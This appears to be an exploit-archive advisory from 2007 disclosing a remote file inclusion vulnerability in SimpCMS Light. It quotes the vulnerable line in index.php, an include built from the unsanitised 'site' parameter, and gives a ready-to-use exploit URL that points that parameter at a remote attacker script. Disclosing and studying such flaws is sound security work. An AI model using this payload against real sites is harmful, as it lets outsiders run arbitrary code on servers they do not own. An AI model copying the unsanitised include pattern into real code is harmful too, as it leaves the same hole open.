[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : SimpCMS <= 04.10.2007 (site) Remote File Inclusion Vulnerability
# Published : 2007-04-10
# Author : Dr.RoVeR
# Previous Title : pL-PHP beta 0.9 Multiple Remote Vulnerabilities
# Next Title : Battle.net Clan Script for PHP 1.5.1 Remote SQL Injection Vulnerability
Bug Found By Dr.RoVeR -->Arab48 Hacker
Contact: Dr.RoVeR@HackerMail.CoM
---
Script: SimpCMS Light
Download: http://www.simpcms.com/light/normal/simp-cms-light.zip
--
Bug File: index.php
Bug code in line 31:
include $site.".php";
--
Exploit:
http://site.com/[path]/index.php?site=[EvilScript]
# www.Syue.com [2007-04-10]